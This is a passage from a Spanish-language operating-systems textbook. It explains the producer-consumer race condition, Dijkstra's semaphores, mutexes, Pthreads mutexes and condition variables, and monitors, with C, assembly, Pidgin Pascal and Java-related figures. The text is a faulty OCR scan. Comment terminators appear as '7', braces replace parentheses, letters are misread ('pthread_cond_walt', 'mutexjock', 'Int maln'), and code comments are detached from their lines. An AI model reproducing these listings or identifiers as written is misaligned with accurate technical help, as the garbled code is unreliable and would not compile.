} 


/* número de ranuras en el búfer 7 
/* número de elementos en el búfer 7 


/* se repite en forma indefinida 7 

/* genera el siguiente elemento 7 

/* si el búfer está lleno, pasa a inactivo 7 

/* coloca elemento en búfer 7 

/* incrementa cuenta de elementos en búfer 7 

/* ¿estaba vacío el búfer? */ 


/* se repite en forma indefinida 7 
/* si búfer está vacío, pasa a inactivo 7 
/* saca el elemento del búfer 7 
/* disminuye cuenta de elementos en búfer 7 
/* ¿estaba lleno el búfer? 7 
/* imprime el elemento 7 


Figura 2-27. El problema del productor-consumidor con una condición de carrera fatal. 


Los procedimientos insertar_elennentO y quitar_elennentO, que no se muestran aquí, se encar¬ 
gan de colocar elementos en el búfer y sacarlos del mismo. 

Ahora regresemos a la condición de carrera. Puede ocurrir debido a que el acceso a cuenta no 
está restringido. Es posible que ocurra la siguiente situación; el búfer está vacío y el consumidor aca¬ 
ba de leer cuenta para ver si es 0. En ese instante, el planificador decide detener al consumidor en 
forma temporal y empieza a ejecutar el productor. El productor inserta un elemento en el búfer, in¬ 
crementa cuenta y observa que ahora es 1. Razonando que cuenta era antes 0, y que por ende el con¬ 
sumidor debe estar dormido, el productor llama a wakeup para despertar al consumidor. 

Por desgracia, el consumidor todavía no está lógicamente dormido, por lo que la señal para des¬ 
pertarlo se pierde. Cuando es turno de que se ejecute el consumidor, evalúa el valor de cuenta que 
leyó antes, encuentra que es 0 y pasa a dormirse. Tarde o temprano el productor llenará el búfer y 
también pasará a dormirse. Ambos quedarán dormidos para siempre. 
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La esencia del problema aquí es que una señal que se envía para despertar a un proceso que 
no está dormido (todavía) se pierde. Si no se perdiera, todo funcionaría. Una solución rápida es 
modificar las reglas para agregar al panorama un bit de espera de despertar. Cuando se envía 
una señal de despertar a un proceso que sigue todavía despierto, se fija este bit. Más adelante, 
cuando el proceso intenta pasar a dormir, si el bit de espera de despertar está encendido, se apa¬ 
gará pero el proceso permanecerá despierto. Este bit es una alcancía para almacenar señales de 
despertar. 

Aunque el bit de espera de despertar logra su cometido en este ejemplo simple, es fácil cons¬ 
truir ejemplos con tres o más procesos en donde un bit de espera de despertar es insuficiente. Po¬ 
dríamos hacer otra modificación y agregar un segundo bit de espera de despertar, tal vez hasta 8 o 
32 de ellos, pero en principio el problema sigue ahí. 


2.3.5 Semáforos 

Esta era la situación en 1965, cuando E. W. Dijkstra (1965) sugirió el uso de una variable entera pa¬ 
ra contar el número de señales de despertar, guardadas para un uso futuro. En su propuesta introdu¬ 
jo un nuevo tipo de variable, al cual él le llamó semáforo. Un semáforo podría tener el valor 0, 
indicando que no se guardaron señales de despertar o algún valor positivo si estuvieran pendientes 
una o más señales de despertar. 

Dijkstra propuso que se tuvieran dos operaciones, down y up (generalizaciones de sleep y 
wakeup, respectivamente). La operación down en un semáforo comprueba si el valor es mayor que 0. 
De ser así, disminuye el valor (es decir, utiliza una señal de despertar almacenada) y sólo continúa. 
Si el valor es 0, el proceso se pone a dormir sin completar la operación down por el momento. Las 
acciones de comprobar el valor, modificarlo y posiblemente pasar a dormir, se realizan en conjun¬ 
to como una sola acción atómica indivisible. Se garantiza que, una vez que empieza una operación 
de semáforo, ningún otro proceso podrá acceder al semáforo sino hasta que la operación se haya 
completado o bloqueado. Esta atomicidad es absolutamente esencial para resolver problemas de 
sincronización y evitar condiciones de carrera. Las acciones atómicas, en las que un grupo de ope¬ 
raciones relacionadas se realizan sin interrupción o en definitiva no se realizan, son en extremo im¬ 
portantes en muchas otras áreas de las ciencias computacionales también. 

La operación up incrementa el valor del semáforo direccionado. Si uno o más procesos esta¬ 
ban inactivos en ese semáforo, sin poder completar una operación down anterior, el sistema selec¬ 
ciona uno de ellos (al azar) y permite que complete su operación down. Así, después de una 
operación up en un semáforo que contenga procesos dormidos, el semáforo seguirá en 0 pero ha¬ 
brá un proceso menos dormido en él. La operación de incrementar el semáforo y despertar a un pro¬ 
ceso también es indivisible. Ningún proceso se bloquea al realizar una operación up, de igual forma 
que ningún proceso se bloquea realizando una operación wakeup en el modelo anterior. 

Como punto adicional, en su artículo original, Dijsktra utilizó los nombres P y V en vez de down 
y up, respectivamente. Como éstos no tienen un significado nemónico para las personas que no ha¬ 
blan holandés y sólo tienen un significado marginal para aquellos que lo hablan [P roberen (inten¬ 
tar) y Verhogen (elevar, elevar más)], utilizaremos los términos down y up en su defecto. Estos se 
introdujeron por primera vez en el lenguaje de programación Algol 68. 
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Cómo resolver el problema del productor-consumidor mediante el uso de semáforos 

Los semáforos resuelven el problema de pérdida de señales de despertar, como se muestra en la fi¬ 
gura 2-28. Para que funcionen de manera correcta, es esencial que se implementen de una forma in¬ 
divisible. Lo normal es implementar up y down como llamadas al sistema, en donde el sistema 
operativo deshabilita brevemente todas las interrupciones, mientras evalúa el semáforo, lo actuali¬ 
za y pone el proceso a dormir, si es necesario. Como todas estas acciones requieren sólo unas cuan¬ 
tas instrucciones, no hay peligro al deshabilitar las interrupciones. Si se utilizan varias CPUs, cada 
semáforo debe estar protegido por una variable de candado, en donde se utilicen las instrucciones 
TSL o XCHG para asegurar que sólo una CPU a la vez pueda examinar el semáforo. 

Asegúrese de comprender que el uso de TSL o XCHG, para evitar que varias CPUs tengan acce¬ 
so al semáforo al mismo tiempo, es algo muy distinto al caso en el que el productor o el consumi¬ 
dor están en espera ocupada, esperando a que el otro vacíe o llene el búfer. La operación de 
semáforo sólo tarda unos cuantos microsegundos, mientras que el productor o el consumidor po¬ 
drían tardarse una cantidad de tiempo arbitraria y extensa. 

Esta solución utiliza tres semáforos; uno llamado llenas para contabilizar el número de ranuras 
llenas, otro llamado vacías para contabilizar el número de ranuras vacías y el último llamado mu- 
tex, para asegurar que el productor y el consumidor no tengan acceso al búfer al mismo tiempo. Al 
principio llenas es 0, vacías es igual al número de ranuras en el búfer y mutex es 1. Los semáforos 
que se inicializan a 1 y son utilizados por dos o más procesos para asegurar que sólo uno de ellos 
pueda entrar a su región crítica en un momento dado se llaman semáforos binarlos. Si cada proce¬ 
so realiza una operación down justo antes de entrar a su región crítica y una operación up justo des¬ 
pués de salir de ella, se garantiza la exclusión mutua. 

Ahora que tenemos una buena primitiva de comunicación entre procesos a nuestra disposición, 
volvamos a analizar la secuencia de interrupción de la figura 2-5. En un sistema que utiliza semáfo¬ 
ros, la forma natural de ocultar las interrupciones es asociar un semáforo (que al principio es 0) con 
cada dispositivo de E/S. Justo después de iniciar un dispositivo de E/S, el proceso administrati¬ 
vo realiza una operación down en el semáforo asociado, con lo cual se bloquea de inmediato. Cuan¬ 
do entra la interrupción, el manejador de interrupciones realiza una operación up en el semáforo 
asociado, lo cual hace que el proceso relevante esté listo para ejecutarse de nuevo. En este modelo, 
el paso 5 de la figura 2-5 consiste en realizar una operación up en el semáforo del dispositivo, de 
manera que en el paso 6 el planificador pueda ejecutar el administrador de dispositivos. Desde lue¬ 
go que, si hay varios procesos listos en ese momento, el planificador puede optar por ejecutar un 
proceso aún más importante a continuación. Más adelante en este capítulo analizaremos algunos de 
los algoritmos que se utilizan para la planificación. 

En el ejemplo de la figura 2-28, en realidad hemos utilizado semáforos de dos maneras distin¬ 
tas. Esta diferencia es lo bastante importante como para recalcarla explícitamente. El semáforo mu- 
tex se utiliza para la exclusión mutua. Está diseñado para garantizar que sólo un proceso pueda leer 
o escribir en el búfer y sus variables asociadas en un momento dado. Esta exclusión mutua es re¬ 
querida para evitar un caos. En la siguiente sección estudiaremos la exclusión mutua y cómo pode¬ 
mos lograrla. 
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#define N 100 
typedef int semáforo; 
semáforo mutex = 1; 
semáforo vacias = N; 
semáforo llenas = 0; 

void productor(void) 

{ 

int elemento; 
while{TRUE){ 

elemento = producir_elemento{); 

down{&vacias); 

down{&mutex); 

insertar_elemento{elemento); 

up{&mutex); 

up{&llenas); 

} 

} 


void consumidor(void) 

{ 

int elemento; 

while(TRUE){ 

down{&llenas); 

down{&mutex); 

elemento = quitar_elemento(); 

up{&mutex); 

up(&vacias); 

consumir_elemento{elemento); 

} 

} 


/* número de ranuras en el búfer 7 
/* los semáforos son un tipo especial de int 7 
/* controla el acceso a la región crítica 7 
/* cuenta las ranuras vacías del búfer 7 
/* cuenta las ranuras llenas del búfer 7 


/* TRUE es la constante 1 7 

/* genera algo para colocar en el búfer 7 

/* disminuye la cuenta de ranuras vacías 7 

/* entra a la región crítica 7 

/* coloca el nuevo elemento en el búfer 7 

/* sale de la región crítica 7 

/* incrementa la cuenta de ranuras llenas 7 


/* ciclo infinito 7 

/* disminuye la cuenta de ranuras llenas 7 

/* entra a la región crítica 7 

/* saca el elemento del búfer 7 

/* sale de la región crítica 7 

/* incrementa la cuenta de ranuras vacías 7 

/* hace algo con el elemento 7 


Figura 2-28. El problema del productor-consumidor mediante el uso de semáforos. 


El otro uso de los semáforos es para la sincronización. Los semáforos vacías y llenas se nece¬ 
sitan para garantizar que ciertas secuencias de eventos ocurran o no. En este caso, aseguran que el 
productor deje de ejecutarse cuando el búfer esté lleno y que el consumidor deje de ejecutarse cuan¬ 
do el búfer esté vacío. Este uso es distinto de la exclusión mutua. 

2.3.6 Mutexes 

Cuando no se necesita la habilidad del semáforo de contar, algunas veces se utiliza una versión sim¬ 
plificada, llamada mutex. Los mutexes son buenos sólo para administrar la exclusión mutua para 
cierto recurso compartido o pieza de código. Se implementan con facilidad y eficiencia, lo cual 
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hace que sean especialmente útiles en paquetes de hilos que se implementan en su totalidad en es¬ 
pacio de usuario. 

Un mutex es una variable que puede estar en uno de dos estados: abierto (desbloqueado) o ce¬ 
rrado (bloqueado). En consecuencia, se requiere sólo 1 bit para representarla, pero en la práctica se 
utiliza con frecuencia un entero, en donde 0 indica que está abierto y todos los demás valores indi¬ 
can que está cerrado. Se utilizan dos procedimientos con los mutexes. Cuando un hilo (o proceso) 
necesita acceso a una región crítica, llama a nnutex_lock. Si el mutex está actualmente abierto (lo 
que significa que la región crítica está disponible), la llamada tiene éxito y entonces el hilo llama¬ 
dor puede entrar a la región crítica. 

Por otro lado, si el mutex ya se encuentra cerrado, el hilo que hizo la llamada se bloquea has¬ 
ta que el hilo que está en la región crítica termine y llame a nnutex_unlock. Si se bloquean varios hi¬ 
los por el mutex, se selecciona uno de ellos al azar y se permite que adquiera el mutex. 

Como los mutexes son tan simples, se pueden implementar con facilidad en espacio de usua¬ 
rio, siempre y cuando haya una instrucción TSL o XCHG disponible. El código para mutex_lock y mu- 
tex_unlock para utilizar estos procedimientos con un paquete de hilos de nivel usuario se muestra 
en la figura 2-29. La solución con XCHG es en esencia similar. 


mutexjock: 

TSL REGISTRO,MUTEX 
CMP REGISTRO,#0 
JZE ok 

CALL thread_yield 
JMP mutexjock 
ok: RET 


Icopia el mutex al registro y estabiece mutex a 1 
|¿ei mutex era 0? 

|si era cero, ei mutex estaba abierto, entonces regresa 
|ei mutex está ocupado; pianifica otro hiio 
¡intenta de nuevo 

¡regresa ai procedimiento iiamador; entra a ia región crítica 


mutex_uniock: 

MOVE MUTEX,#0 laimacena un 0 en ei mutex 

RET ¡regresa ai procedimiento iiamador 

Figura 2-29. Implementaciones de mutex_¡ock y mutex_un¡ock. 


El código de mutex_lock es similar al código de entrar_region de la figura 2-25, pero con una 
diferencia crucial. Cuando entrar_region no puede entrar a la región crítica, continúa evaluando el 
mutex en forma repetida (espera ocupada). En algún momento dado el reloj se agotará y algún otro 
proceso se programará para ejecutarlo. Tarde o temprano el proceso que mantiene el mutex pasa a 
ejecutarse y lo libera. 

Con los hilos (de usuario), la situación es distinta debido a que no hay un reloj que detenga los 
hilos que se han ejecutado por demasiado tiempo. En consecuencia, un hilo que intente adquirir un 
mutex mediante la espera ocupada iterará en forma indefinida y nunca adquirirá el mutex debido a 
que nunca permitirá que algún otro hilo se ejecute y libere el mutex. 

Aquí es donde entra la diferencia entre entrar_region y mutex_lock. Cuando este último procedi¬ 
miento no puede adquirir un mutex, llama a thread_yield para entregar la CPU a otro hilo. En conse¬ 
cuencia, no hay espera ocupada. Cuando el hilo se ejecuta la siguiente vez, evalúa el mutex de nuevo. 
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Como thread_yield es sólo una llamada al planificador de hilos en espacio de usuario, es muy 
rápido. Como consecuencia, ni mutex_lock ni mutex_unlock requieren llamadas al kernel. Al utili¬ 
zarlas, los hilos en nivel usuario pueden sincronizarse completamente en el espacio de usuario, uti¬ 
lizando procedimientos que sólo requieren unas cuantas instrucciones. 

El sistema con mutex que hemos descrito antes es un conjunto mínimo de llamadas. Con todo 
el software, siempre hay demanda por más características y las primitivas de sincronización no son 
la excepción. Por ejemplo, algunas veces un paquete de hilos ofrece una llamada mutex_trylock que 
adquiere el mutex o devuelve un código de falla, pero no bloquea. Esta llamada otorga al hilo la fle¬ 
xibilidad de decidir qué hacer a continuación, si hay alternativas además de esperar. 

Hasta ahora hay una sutil cuestión que hemos visto sólo en forma superficial, pero que es con¬ 
veniente, por lo menos, hacer explícita. Con un paquete de hilos en espacio de usuario no hay pro¬ 
blema con que varios hilos tengan acceso al mismo mutex, ya que todos los hilos operan en un 
espacio de direcciones común. Sin embargo, con la mayoría de las soluciones anteriores, como el 
algoritmo de Peterson y los semáforos, hay una suposición que no hemos mencionado acerca de que 
varios procesos tienen acceso cuando menos a una parte de la memoria compartida; tal vez sólo a 
una palabra, pero es algo. Si los procesos tienen espacios de direcciones que no están juntos, como 
hemos dicho de manera consistente, ¿cómo pueden compartir la variable turno en el algoritmo de 
Peterson o los semáforos en un búfer común? 

Hay dos respuestas. En primer lugar, algunas de las estructuras de datos compartidas (como los 
semáforos) se pueden almacenar en el kernel y se accede a ellas sólo a través de llamadas al siste¬ 
ma. Este enfoque elimina el problema. En segundo lugar, la mayoría de los sistemas operativos mo¬ 
dernos (incluyendo UNIX y Windows) ofrecen la manera de que los procesos compartan cierta 
porción de su espacio de direcciones con otros procesos. De esta forma se pueden compartir los bú- 
feres y otras estructuras de datos. En el peor de los casos, que nada sea posible, se puede utilizar un 
archivo compartido. 

Si dos o más procesos comparten la mayoría de, o todos, sus espacios de direcciones, la distin¬ 
ción entre procesos e hilos se elimina casi por completo, pero sin duda está presente. Dos procesos 
que comparten un espacio de direcciones común siguen teniendo distintos archivos abiertos, tem- 
porizadores de alarma y otras propiedades correspondientes a cada proceso, mientras que los hilos 
dentro de un solo proceso las comparten. Y siempre es verdad que varios procesos que comparten 
un espacio de direcciones común nunca tendrán la eficiencia de los hilos de nivel usuario, ya que 
el kernel está muy involucrado en su administración. 

M utexes en Pthreads 

Pthreads proporciona varias funciones que se pueden utilizar para sincronizar los hilos. El mecanis¬ 
mo básico utiliza una variable mutex, cerrada o abierta, para resguardar cada región crítica. Un hi¬ 
lo que desea entrar a una región crítica primero trata de cerrar el mutex asociado. Si el mutex está 
abierto, el hilo puede entrar de inmediato y el bloqueo se establece en forma automática, evitando 
que otros hilos entren; si el mutex ya se encuentra cerrado, el hilo que hizo la llamada se bloquea 
hasta que el mutex esté abierto. Si hay varios hilos esperando el mismo mutex, cuando está abierto 
sólo uno de ellos podrá continuar y volver a cerrarlo. Estos bloqueos no son obligatorios. Es res¬ 
ponsabilidad del programador asegurar que los hilos los utilicen de manera correcta. 
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Las principales llamadas relacionadas con los mutexes se muestran en la figura 2-30. Como es 
de esperarse, se pueden crear y destruir. Las llamadas para realizar estas operaciones son pthread- 
_mutex_init y pthread_mutex_destroy, respectivamente. También se pueden cerrar mediante pth- 
read_mutex_lock, que trata de adquirir el mutex y se bloquea si ya está cerrado. Además hay una 
opción para tratar de cerrar un mutex y falla con un código de error en vez de bloquearlo, si ya se 
encuentra bloqueado. Esta llamada es pthread_mutex_trylock y permite que un hilo realice en efec¬ 
to la espera ocupada, si alguna vez se requiere. Por último, Pthread_mutex_unlock abre un mutex y 
libera exactamente un hilo si uno o más están en espera. Los mutexes también pueden tener atribu¬ 
tos, pero éstos se utilizan sólo para propósitos especializados. 


Llamada de hilo 

Descripción 

Pthread mutex init 

Crea un mutex 

Pthread mutex destroy 

Destruye un mutex existente 

Pthread mutex lock 

Adquiere un mutex o se bioquea 

Pthread mutex trylock 

Adquiere un mutex o faiia 

Pthread_mutex_unlock 

Libera un mutex 


Figura 2-30. Algunas de las llamadas de Pthreads relacionadas con mutexes. 


Además de los mutexes, pthreads ofrece un segundo mecanismo de sincronización: las varia¬ 
bles de condición. Los mutexes son buenos para permitir o bloquear el acceso a una región crítica. 
Las variables de condición permiten que los hilos se bloqueen debido a que cierta condición no se 
está cumpliendo. Casi siempre se utilizan los dos métodos juntos. Veamos ahora la interacción de 
hilos, mutexes y variables de condición con un poco más de detalle. 

Como un ejemplo simple, considere nuevamente el escenario del productor-consumidor: un hi¬ 
lo coloca cosas en un búfer y otro las saca. Si el productor descubre que no hay más ranuras libres 
disponibles en el búfer, tiene que bloquear hasta que haya una disponible. Los mutexes hacen que 
sea posible realizar la comprobación en forma atómica sin interferencia de los otros hilos, pero al 
descubrir que el búfer está lleno, el productor necesita una forma de bloquearse y ser despertado 
posteriormente. Esto es lo que permiten las variables de condición. 

Algunas de las llamadas relacionadas con las variables de condición se muestran en la figura 
2-31. Como podríamos esperar, hay llamadas para crear y destruir variables de condición. Pueden 
tener atributos y existen varias llamadas para administrarlas (que no se muestran). Las operaciones 
primarias en las variables de condición son pthread_COnd_wait y pthread_COnd_SÍgnal. La primera 
bloquea el hilo que hace la llamada hasta que algún otro hilo le señala (utilizando la segunda lla¬ 
mada). Desde luego que las razones por las que se debe bloquear y esperar no forman parte del pro¬ 
tocolo de espera y señalización. A menudo el hilo que bloquea está esperando a que el hilo de 
señalización realice cierto trabajo, que libere algún recurso o realice alguna otra actividad. Sólo en¬ 
tonces podrá continuar el hilo bloqueado. Las variables de condición permiten que esta espera y 
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bloqueo se realicen en forma atómica. La llamada a pthread_COnd_broadcast se utiliza cuando hay 
varios hilos potencialmente bloqueados y esperan la misma señal. 


Llamada de hilo 

Descripción 

Pthread cond init 

Crea una variable de condición 

Pthread cond destroy 

Destruye una variable de condición 

Pthread cond wait 

Bloquea en espera de una señal 

Pthread_cond_signal 

Envia señal a otro hilo y lo despierta 

Pthread_cond_broadcast 

Envia señal a varios hilos y los despierta 


Figura 2-31. Algunas de las llamadas a Pthreads que se relacionan con las variables 
de condición. 


Las variables de condición y los mutexes siempre se utilizan en conjunto. El patrón es que un 
hilo cierre un mutex y después espere en una variable condicional cuando no pueda obtener lo que 
desea. En algún momento dado, otro hilo lo señalará y podrá continuar. La llamada a pthread_COnd- 
_wait cierra y abre en forma atómica el mutex que contiene. Por esta razón, el mutex es uno de los 
parámetros. 

También vale la pena observar que las variables de condición (a diferencia de los semáforos) 
no tienen memoria. Si se envía una señal a una variable de condición en la que no haya un hilo en 
espera, se pierde la señal. Los programadores deben tener cuidado de no perder las señales. 

Como ejemplo de la forma en que se utilizan los mutexes y las variables de condición, la figu¬ 
ra 2-32 muestra un problema productor-consumidor muy simple con un solo búfer. Cuando el pro¬ 
ductor ha llenado el búfer, debe esperar hasta que el consumidor lo vacíe para poder producir el 
siguiente elemento. De manera similar, cuando el consumidor ha quitado un elemento, debe espe¬ 
rar hasta que el productor haya producido otro. Aunque es muy simple, este ejemplo ilustra los me¬ 
canismos básicos. La instrucción que pone a un hilo en estado inactivo siempre debe verificar la 
condición, para asegurarse de que se cumpla antes de continuar, ya que el hilo podría haber desper¬ 
tado debido a una señal de UNIX o por alguna otra razón. 


2.3.7 M onitores 

Con los semáforos y los mutexes la comunicación entre procesos se ve sencilla, ¿verdad? Olvíde¬ 
lo. Analice de cerca el orden de las operaciones down antes de insertar o quitar elementos del búfer 
en la figura 2-28. Suponga que se invirtió el orden de las dos operaciones down en el código del pro¬ 
ductor, de manera que mutex se disminuyó antes de vacías, en vez de hacerlo después. Si el búfer 
estuviera completamente lleno el productor se bloquearía, con mutex establecida en 0. En conse¬ 
cuencia, la próxima vez que el consumidor tratara de acceder al búfer, realizaría una operación down 
en mutex (que ahora es 0) y se bloquearía también. Ambos procesos permanecerían bloqueados de 
manera indefinida y no se realizaría más trabajo. Esta desafortunada situación se conoce como in¬ 
terbloqueo (deadlock). En el capítulo 6 estudiaremos los interbloqueos con detalle. 
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#include <stdio.h> 

#include <pthread.h> 

#define MAX 1000000000 
pthread_mutex_t el_mutex; 
pthread_cond_t conde,condp; 
int bufer = 0; 

void *productor{void *ptr) 

{ int i; 

for (i=1; ¡<=MAX; ¡++) { 

pthread_mutex_lock{&el_mutex); /* obtiene acceso exclusivo al búfer */ 
while (buferhO) pthread_cond_walt(&condp, &el_mutex); 
bufer = I; /* coloca elemento en el búfer 7 

pthread_cond_slgnal(&condc); /* despierta al consumidor 7 
pthread_mutex_unlock(&el_mutex); /* libera el acceso al búfer 7 

} 

pthread_exlt(0); 

} 

vold *consum¡dor(void *ptr) /* consume datos 7 

{ int i; 

for (Ni; i<=MAX; I++) { 

pthread_mutex_lock{&el_mutex); /* obtiene acceso exclusivo al búfer 7 
while {bufer==0) pthread_cond_walt(&condc, &el_mutex); 
bufer = 0; /* saca elemento del búfer 7 

pthread_cond_slgnal(&condp); /* despierta al productor 7 
pthread_mutex_unlock(&el_mutex); /* libera el acceso al búfer 7 

} 

pthread_exlt(0); 

} 

Int maln{lnt arge, char **argv) 

{ 

pthread_t pro, con; 
pthread_mutex_lnlt(&el_mutex, 0); 
pthread_cond_init(&condc, 0); 
pthread_cond_init(&condp, 0); 
pthread_create(&con, 0, consumidor, 0); 
pthread_create(&pro, 0, productor, 0); 
pthreadJoin(pro, 0); 
pthreadJoin(con, 0); 
pthread_cond_destroy{&condc); 
pthread_cond_destroy{&condp); 
pth read_m utex_destroy (&el_m utex); 

} 


/* cuántos números debe producir 7 

/* búfer utilizado entre productor y consumidor 7 
/* produce datos 7 
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Figura 2-32. Uso de hilos para resolver el problema del productor-consumidor. 
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Resaltamos este problema para mostrar qué tan cuidadoso debe ser el programador al utilizar 
semáforos. Un ligero error y todo se detiene en forma abrupta. Es como la programación en lengua¬ 
je ensamblador, sólo que peor, debido a que los errores son condiciones de carrera, interbloqueos y 
otras formas de comportamiento impredecible e irreproducible. 

Para facilitar la escritura de programas correctos, Brinch Hansen (1973) y Hoare (1974) pro¬ 
pusieron una primitiva de sincronización de mayor nivel, conocida como monitor. Sus proposicio¬ 
nes tenían ligeras variaciones, como se describe a continuación. Un monitor es una colección de 
procedimientos, variables y estructuras de datos que se agrupan en un tipo especial de módulo o pa¬ 
quete. Los procesos pueden llamar a los procedimientos en un monitor cada vez que lo desean, pe¬ 
ro no pueden acceder de manera directa a las estructuras de datos internas del monitor desde 
procedimientos declarados fuera de éste. La figura 2-33 ilustra un monitor escrito en un lenguaje 
imaginario, Pidgin Pascal. Aquí no podemos utilizar C debido a que los monitores son un concep¬ 
to del lenguaje, y C no los tiene. 


monitor ejemplo 

integer i; 
condition c; 

procedure productor!); 


end; 


procedure consumidorQ; 

end: 

end monitor; 

Figura 2-33. Un monitor. 


Los monitores tienen una importante propiedad que los hace útiles para lograr la exclusión mu¬ 
tua: sólo puede haber un proceso activo en un monitor en cualquier instante. Los monitores son una 
construcción del lenguaje de programación, por lo que el compilador sabe que son especiales y pue¬ 
de manejar las llamadas a los procedimientos del monitor en forma distinta a las llamadas a otros pro¬ 
cedimientos. Por lo general, cuando un proceso llama a un procedimiento de monitor, las primeras 
instrucciones del procedimiento comprobarán si hay algún otro proceso activo en un momento dado 
dentro del monitor. De ser así, el proceso invocador se suspenderá hasta que el otro proceso haya de¬ 
jado el monitor. Si no hay otro proceso utilizando el monitor, el proceso invocador puede entrar. 

Es responsabilidad del compilador implementar la exclusión mutua en las entradas del moni¬ 
tor, pero una forma común es utilizar un mutex o semáforo binario. Como el compilador (y no el 
programador) está haciendo los arreglos para la exclusión mutua, es mucho menos probable que al- 
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go salga mal. En cualquier caso, la persona que escribe el monitor no tiene que saber acerca de có¬ 
mo el compilador hace los arreglos para la exclusión mutua. Basta con saber que, al convertir todas 
las regiones críticas en procedimientos de monitor, nunca habrá dos procesos que ejecuten sus re¬ 
giones críticas al mismo tiempo. 

Aunque los monitores proporcionan una manera fácil de lograr la exclusión mutua, como he¬ 
mos visto antes, eso no basta; también necesitamos una forma en la que los procesos se bloqueen 
cuando no puedan continuar. En el problema del productor-consumidor, es bastante sencillo colo¬ 
car todas las pruebas de búfer-lleno y búfer-vacío en procedimientos de monitor, pero ¿cómo debe¬ 
ría bloquearse el productor si encuentra que el búfer está lleno? 

La solución está en la introducción de las variables de condición, junto con dos operaciones 
de éstas: wait y signal. Cuando un procedimiento de monitor descubre que no puede continuar (por 
ejemplo, el productor encuentra el búfer lleno), realiza una operación wait en alguna variable de 
condición (por decir, llenas). Esta acción hace que el proceso que hace la llamada se bloquee. Tam¬ 
bién permite que otro proceso que no haya podido entrar al monitor entre ahora. En el contexto de 
Pthreads antes descrito vimos las variables de condición y estas operaciones. 

Por ejemplo, este otro proceso, el consumidor, puede despertar a su socio dormido median¬ 
te la realización de una operación signal en la variable de condición que su socio esté esperan¬ 
do. Para evitar tener dos procesos activos en el monitor al mismo tiempo, necesitamos una regla 
que indique lo que ocurre después de una operación signal. Hoare propuso dejar que el proceso 
recién despertado se ejecutara, suspendiendo el otro. Brinch Hansen propuso requerir que un pro¬ 
ceso que realice una operación signal deba salir del monitor de inmediato. En otras palabras, una 
instrucción signal podría aparecer sólo como la instrucción final en un procedimiento de moni¬ 
tor. Utilizaremos la proposición de Brinch Hansen debido a que, en concepto, es más simple y 
también más fácil de implementar. Si se realiza una operación signal en una variable de condi¬ 
ción que varios procesos estén esperando, sólo uno de ellos, que determine el planificador del sis¬ 
tema, se revivirá. 

Adicionalmente hay una tercera solución, que no propusieron Hoare ni Brinch Hansen. Esta so¬ 
lución expone que se debe dejar que el señalizador continúe su ejecución y permita al proceso en 
espera empezar a ejecutarse sólo después que el señalizador haya salido del monitor. 

Las variables de condición no son contadores; no acumulan señales para su uso posterior co¬ 
mo hacen los semáforos. Por ende, si una variable de condición se señaliza y no hay ningún proce¬ 
so esperándola, la señal se pierde para siempre. En otras palabras, la operación wait debe ir antes 
de la operación signal. Esta regla facilita la implementación en forma considerable. En la práctica 
no es un problema debido a que es fácil llevar el registro del estado de cada proceso con variables, 
si es necesario. Un proceso, que de lo contrario realizaría una operación signal, puede ver que es¬ 
ta operación no es necesaria con sólo analizar las variables. 

En la figura 2-34 se muestra un esqueleto del problema productor-consumidor con monitores 
en un lenguaje imaginario, Pidgin Pascal. La ventaja de utilizar Pidgin Pascal aquí es que es un len¬ 
guaje puro y simple, que sigue el modelo de Hoare/Brinch Hansen con exactitud. 

Tal vez el lector esté pensando que las operaciones wait y signal se parecen a sleep y wakeup, 
operaciones que vimos antes y tenían condiciones de carrera fatales. En realidad SOn muy simila¬ 
res, pero con una diferencia crucial: sleep y wakeup fallaban debido a que, mientras un proceso 
estaba tratando de dormir, el otro estaba tratando de despertarlo. Con los monitores, esto no puede 
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monitor ProductorConsumidor 

condition llenas, vacias; 
integer cuenta; 

procedurelnsertar(elemento: Integer); 

begin 

if cuenta = N then wait(llenas); 
lnsertar_elemento(elemento); 
cuenta ;= cuenta + 1; 
if cuenta = 1 then signai(vacias) 

end; 

function eliminar: integer; 

begin 

if cuenta = 0 then wait(vacias); 
eliminar = eliminar_elemento; 
cuenta := cuenta - 1; 
if cuenta = N - 1 then signai(l lenas) 

end; 


cuenta := 0; 

end monitor; 

procedure productor; 

begin 

whiietrue do 
begin 

elemento = producir_elemento; 
ProductorConsumidor.insertar(elemento) 

End 

end; 

procedure consumidor; 

begin 

whiietrue do 
begin 

elemento = ProductorConsumidor.eliminar; 
consumir_elemento(el emento) 

end 

end; 


Figura 2-34. Un esquema del problema productor-consumidor con monitores. Sólo hay 
un procedimiento de monitor activo a la vez. El búfer tiene N ranuras. 


ocurrir. La exclusión mutua automática en los procedimientos de monitor garantiza que (por ejem¬ 
plo) si el productor dentro de un procedimiento de monitor descubre que el búfer está lleno, podrá 
completar la operación wait sin tener que preocuparse por la posibilidad de que el planificador pue¬ 
da conmutar al consumidor justo antes de que se complete la operación wait. Al consumidor ni si- 
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quiera se le va permitir entrar al monitor hasta que wait sea terminado y el productor se haya mar¬ 
cado como no ejecutable. 

Aunque Pidgin Pascal es un lenguaje imaginario, algunos lenguajes de programación reales 
también permiten implementar monitores, aunque no siempre en la forma diseñada por Hoare y 
Brinch Hansen. Java es uno de esos lenguajes. Java es un lenguaje orientado a objetos que soporta 
hilos a nivel usuario y también permite agrupar métodos (procedimientos) en clases. Al agregar la 
palabra clave synchronized a la declaración de un método. Java garantiza que, una vez un hilo ha 
empezado a ejecutar ese método, no se permitirá que ningún otro hilo empiece a ejecutar ningún 
otro método synchronized de ese objeto. 

En la figura 2-35 se muestra una solución en Java para el problema del productor-consumidor 
que utiliza monitores. La solución consiste en cuatro clases; la clase exterior (P roductorC onsumidor) 
crea e inicia dos hilos, p y C; las clases segunda y tercera (productor y consumidor, respectivamen¬ 
te) contienen el código para el productor y el consumidor; por último, la clase nuestro_monitor es 
el monitor. Contiene dos hilos sincronizados que se utilizan para insertar elementos en el búfer com¬ 
partido y sacarlos. A diferencia de los ejemplos anteriores, en este caso mostramos el código 
completo de insertar y eiiminar. 

Los hilos productor y consumidor son idénticos en funcionalidad a sus contrapartes en todos 
nuestros ejemplos anteriores. El productor tiene un ciclo infinito que genera datos y los coloca en 
el búfer común; el consumidor tiene un ciclo infinito equivalente para sacar datos del búfer común 
y realizar algo divertido con ellos. 

La parte interesante de este programa es la clase nuestro_monitor, que contiene el búfer, las va¬ 
riables de administración y dos métodos sincronizados. Cuando el productor está activo dentro de 
insertar, sabe de antemano que el consumidor no puede estar activo dentro de eliminar, con lo cual 
es seguro actualizar las variables y el búfer sin temor de que se produzcan condiciones de carrera. 
La variable cuenta lleva el registro de cuántos elementos hay en el búfer. Sólo puede tomar un va¬ 
